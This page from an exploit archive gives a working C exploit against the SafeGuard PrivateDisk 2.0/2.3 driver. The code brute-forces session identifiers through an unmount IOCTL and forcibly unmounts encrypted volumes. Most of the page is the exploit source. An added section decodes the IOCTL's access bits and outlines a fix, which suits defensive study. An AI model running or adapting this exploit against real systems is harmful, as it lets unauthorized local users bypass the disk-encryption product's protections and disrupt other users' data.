SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities

05 Mar 2008 | Reported by mu-b | Type: exploitdb | Source: www.exploit-db.com


Code
// source: https://www.securityfocus.com/bid/45749/info

SafeGuard PrivateDisk is prone to multiple local security-bypass vulnerabilities.

Attackers with physical access to a computer with the affected application installed can exploit these issues to bypass certain security restrictions and perform unauthorized actions.

SafeGuard PrivateDisk 2.0 and 2.3 are vulnerable; other versions may also be affected. 

/* safeguard-pdisk-unmount.c
 *
 * Copyright (c) 2008 by <[email protected]>
 *
 * Utimaco Safeware AG (Sophos) - SafeGuard PrivateDisk unmount exploit
 * by mu-b - Wed 05 Mar 2008
 *
 * - Tested on: privatediskm.sys 2.2.0.16
 *                (<= Utimaco Safeware AG (Sophos) - SafeGuard PrivateDisk 2.0)
 *              privatediskm.sys
 *                (<= Sophos - SafeGuard PrivateDisk 2.3)
 *
 * This exploit 'tunnels' an ioctl request to the mounted volume device
 * for the volume file given in the argument, the request will forcibly
 * unmount the device.
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>
#include <ddk/ntapi.h>

#define SGPD_UNMOUNT_IOCTL      0x0007200C
#define SGPD_MAX_SESSION_ID     0xFFFFF

struct ioctl_req {
  int  session_id;
  char volume_buf[0x200];
};

int
main (int argc, char **argv)
{
  struct ioctl_req req;
  DWORD i, j, rlen;
  CHAR buf[0x100];
  HANDLE hFile;
  BOOL result;

  printf ("Utimaco Safeware AG - SafeGuard PrivateDisk unmount exploit\n"
          "by: <[email protected]>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <volume file>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  hFile = CreateFileA ("\\\\.\\PrivateDisk", GENERIC_READ,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %lu\n", GetLastError ());
      exit (EXIT_FAILURE);
    }

  memset (buf, 0, sizeof buf);
  strncpy (buf, argv[1], sizeof buf - 1);

  for (i = 0, j = 0; i < sizeof req.volume_buf - 4; i += 2, j++)
    {
      req.volume_buf[i] = buf[j];
      req.volume_buf[i+1] = 0x00;
    }

  for (i = 0; i < SGPD_MAX_SESSION_ID; i++)
    {
      req.session_id = i;

      result = DeviceIoControl (hFile, SGPD_UNMOUNT_IOCTL,
                                &req, sizeof req,
                                &req, sizeof req, &rlen, 0);
      if (result)
        {
          printf ("* found, session_id: %d, volume name: %s", i, buf);
          break;
        }

      if (!(i % 64))
        {
          printf ("* trying session_id: %d\r", i);
        }
    }
  printf ("\n* done\n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}
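
Added example, not part of the original listing or the vendor's code: decoding the listing's SGPD_UNMOUNT_IOCTL with the standard Windows CTL_CODE bit layout shows a vendor-defined function declared with FILE_ANY_ACCESS, which is why a handle opened with only GENERIC_READ can submit it, and the 0xFFFFF loop bound corresponds to a 20-bit session id space. The macro and function names below are hypothetical; only the two SGPD_* constants come from the page.

```c
#include <stdio.h>
#include <stdint.h>

/* CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method */
#define IOCTL_DEVICE(c)   (((uint32_t)(c) >> 16) & 0xFFFFu)
#define IOCTL_ACCESS(c)   (((uint32_t)(c) >> 14) & 0x3u)
#define IOCTL_FUNCTION(c) (((uint32_t)(c) >> 2) & 0xFFFu)
#define IOCTL_METHOD(c)   ((uint32_t)(c) & 0x3u)

#define ACCESS_ANY   0u   /* FILE_ANY_ACCESS   */
#define ACCESS_WRITE 2u   /* FILE_WRITE_ACCESS */

#define SGPD_UNMOUNT_IOCTL  0x0007200Cu  /* from the listing above */
#define SGPD_MAX_SESSION_ID 0xFFFFFu     /* from the listing above */

/* Flag vendor-defined functions (>= 0x800) that any handle access may call. */
int ioctl_needs_review (uint32_t code)
{
  return IOCTL_FUNCTION (code) >= 0x800u && IOCTL_ACCESS (code) == ACCESS_ANY;
}

/* Same device/function/method, but the I/O manager demands write access. */
uint32_t ioctl_require_write (uint32_t code)
{
  return (code & ~(0x3u << 14)) | (ACCESS_WRITE << 14);
}

/* Smallest number of bits that covers identifiers in [0, max_id). */
unsigned id_space_bits (uint32_t max_id)
{
  unsigned bits = 0;
  while (bits < 32 && (1ull << bits) < max_id)
    bits++;
  return bits;
}

int main (void)
{
  uint32_t c = SGPD_UNMOUNT_IOCTL;

  /* Device type 0x7 is FILE_DEVICE_DISK; method 0 is METHOD_BUFFERED. */
  printf ("device=0x%x function=0x%x method=%u access=%u review=%d\n",
          (unsigned) IOCTL_DEVICE (c), (unsigned) IOCTL_FUNCTION (c),
          (unsigned) IOCTL_METHOD (c), (unsigned) IOCTL_ACCESS (c),
          ioctl_needs_review (c));
  printf ("write-gated code=0x%08x, session id space=%u bits\n",
          (unsigned) ioctl_require_write (c),
          id_space_bits (SGPD_MAX_SESSION_ID));
  return 0;
}
```

Gating the control code on write access only changes what the I/O manager checks on the handle; the driver still has to authorize the caller for the session rather than rely on an identifier that can be enumerated.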
